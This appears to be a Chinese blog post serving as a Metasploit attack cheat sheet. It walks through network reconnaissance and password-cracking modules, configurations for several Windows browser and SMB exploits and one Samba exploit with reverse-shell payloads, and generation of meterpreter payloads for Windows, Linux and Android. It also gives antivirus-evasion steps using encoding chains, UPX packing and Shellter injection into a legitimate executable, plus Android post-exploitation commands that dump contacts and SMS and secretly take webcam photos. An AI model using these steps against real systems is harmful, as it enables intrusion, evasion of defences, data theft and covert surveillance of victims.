• msf基础使用


    service postgresql start
    service metasploit start
    msfconsole
    进入后输入db_status  查看数据库连接状态
    workspace -a test 创建工作台
    Workspace test 进入工作台
    信息收集

          msf> whois xxx.com
          msf>whois 192.168.1.100

        在线收集服务器ip信息工具 :
        http://searchdns.netcraft.com/

          nmap -sS xxx  (-O 看操作系统)   
              msf>use auxiliary/scanner/ip/ipidseq  看某个网段谁开了**端口。  show options  看配置。set **  设置。run 开始

           msf>use auxiliary/scanner/portscan/syn  扫描开放端口 set RHOSTS ***  。set THREADS 50
       
          msf>use auxiliary/scanner/smb/smb_version 扫描网段开放445的 。 set RHOSTS 192.168.2.0/24 。set THREADS 50
       
              msf>use auxiliary/scanner/mssql/mssql_ping 扫描开放mssql
              msf>use auxiliary/scanner/ssh/ssh_version 扫描网段ssh服务器
              msf>use auxiliary/scanner/telnet/telnet_version 扫描网段telnet
              msf>use auxiliary/scanner/ftp/ftp_version 扫描网段ftp
              msf>use auxiliary/scanner/ftp/anonymous 扫描网段ftp可匿名登录的
              msf>use auxiliary/scanner/discovery/arp_sweep 存活主机
              msf>use auxiliary/scanner/http/dir_scanner 网站目录
              msf>use auxiliary/scanner/snmp/snmp_login 扫描snmp主机
              msf>use auxiliary/gather/search_email_collector 搜索网站中email地址 set DOMAIN **.com
              msf>use auxiliary/sniffer/psnuffle 嗅探抓包(ftp密码)
              search mysql_login  搜索mysql口令破解模块,并利用
              search postgre_login  搜索post sql口令破解模块
                     telnet
              search tomcat_mgr_login  搜索tomcat口令破解模
              search ssh_login  搜索ssh口令破解模块
              msf>use auxiliary/scanner/smb/samba_version 破解samba

    微软等漏洞利用 如
         ms10_002  (浏览器漏洞):
          msf>search ms10_002
          msf>use exploit/windows/browser/ms10_002_aurora
           msf>set SRVHOST  192.168...            本机ip
          msf>set payload windows/meterpreter/reverse_tcp 侦听反弹shell载荷
            msf>set SRVPORT 80   接受的端口 不设置默认8080
          msf>set URIPATH /    可有无  根目录
          msf>set LHOST 192.168...              本机ip
          msf>set LPORT 1211                    本地端口
          msf>exploit 攻击
              会有生成一个网址 给目标打开,之后返回 一些信息 session 1
          之后 输入 msf>session -i 查看会话和id*  
              使用 msf>sessions -i *  
               meterpreter>shell   获得shell 可输入cmd命令ipconfig whoami   
          ctrl z 退出   ctrl c 后台运行
    ————————
         ms10_018 (浏览器漏洞):
        msf>search  ms10_018
         msf>set SRVHOST  192.168...            本机ip
        msf>set SRVPORT 8081           注意冲突
        msf>set payload windows/shell/reverse_tcp   用shell 攻击性低
         msf>set LHOST 192.168...              本机ip
        msf>set LPORT 1211                    本地端口
        msf>exploit 攻击
         会有生成一个网址 给目标打开
        输入 msf>session -i 查看会话和id*
    ————————*****蓝屏
         ms12_020 (需要开3389   在win 输入netstat -an |find“3389” 查)
        search 结果  第二个搜索漏洞  第一个利用
    ————————
        ms10_046  (范围广泛)
        msf>set SRVHOST  192.168...         
        msf>set SRVPORT 80   
        msf>set payload windows/shell/reverse_tcp   
         msf>set LHOST 192.168...            
        msf>set LPORT                           

    生成两个 一个是共享(//***)另个为网址 转化后和第一个一样 里面有文件,打开即可
    ————————
        ms08_067 (早期,测试,范围广)
         msf>use
        msf>set RHOST ***(mubiao)
        msf>s   
    (show target)
        msf>set target **  填目标版本对应的id
    ————————
        ms12_004 浏览器 xpsp3 ,ie 6 7 8          *
         msf>use
         msf>set payload windows/meterpreter/reverse_tcp
        msf>set SRVHOST  192.168...         
        msf>set SRVPORT **   
         msf>set LHOST 192.168...            
        msf>set LPORT   
        exploit     
    ————————
        linux samba 漏洞  适应版本 debain 3.1*3.2
        search samba
        use linux/samba/lsa_transnames_heap
        show payload
        set payload linux /x86/shell_bind_tcp           ?
        set LPORT 8080
        set RHOST 192.168
        exploit
    ————————
        dll 注入(到目标系统)
        use exploit/windows/browser/wendab_dll_hijacker
         msf>set payload windows/meterpreter/reverse_tcp
        msf>set SRVHOST  192.168...         
        msf>set SRVPORT 80 必须80  
         msf>set RHORT **
         msf>set LHOST 192.168...            
        msf>set LPORT   
        msf>set urlpath /
    ————————————————————————————————————————————————
    shellcode 使用
        (少于远控 功能单一 可以生成 windows linux andriond java php)
    ——————   
       windows
       
        -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >shy.exe
        ****
        ****编码免杀 (-t 输出形式;-c编码次数,次数过多可能会使shellcode失            效;-e 加编码类型 ;可用msfencode -l 查看所有编码)
        -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 R|msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/countdown -c 5 -t exe -o /root/shy.exe
        ****
        ****加壳免杀 (upx壳)
        -#upx -5 shy.exe
        ****
        ****veil 免杀
        ****
        ****shellter免杀 (shellcode代码注入工具)
    找一个正常运行的exe,如putty.exe,向其注入。将工具shellterv4放入kali,解压unzip shellter_v4.0.zip,进入所解压的目录,运行shellter.exe(提升其权限,chmod 777 shellter.exe).(A/M/H,选A).PE Target: /root/putty.exe (L/C/H 选L 后输入1)。set LHOST: *** 。 SET LPORT **  。
        配置监听载荷:
        msf>use payload windows/meterpreter/reverse_tcp
        msf>set LHOST **
        msf>set LPORT **
        ****
        ****   
        msf>use exploit/multi/handler
        msf>set payload windows/meterpreter/reverse_tcp
        msf>set LHOST  ***133
        msf>set LPORT   一致
        exploit
          可以用 -# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
    ——————
    linux
        -# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >/root/shy.exe
         监听
        msf>use exploit/multi/handler
        msf>set payload linux /x86/meterpreter/reverse_tcp
        msf>set LHOST  ***133
        msf>set LPORT   一致
        exploit

          可以用 -# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
    在目标linux中修改exe权限 # chmod 777 shy。exe
    然后。/shy 执行
    ——————
    android

        -# msfpayload andriod/meterpreter/reverse_tcp LHOST=** LPORT=1211  R>/root/shy.apk
        监听
        msf>use exploit/multi/handler
        msf>set payload andriod/meterpreter/reverse_tcp
        msf>set LHOST  ***133
        msf>set LPORT   一致
        exploit
        dump_contacts  到出电话
        dump_sms
        Webcam_list 看有几个摄像头
        -i 1  选择后面摄像头
        webcam_snap 拍照
        webcam_stream 开摄像头

  • 相关阅读:
    符号运算·
    笔记1
    Linux
    三数比较
    JavaScript变量,作用域和内存
    在HTML中使用JavaScript
    JavaScript基本概念
    JavaScript简介
    上机考试反思与总结
    计算机科学与技术学习方法
  • 原文地址:https://www.cnblogs.com/Gouwa/p/15899251.html
Copyright © 2020-2023  润新知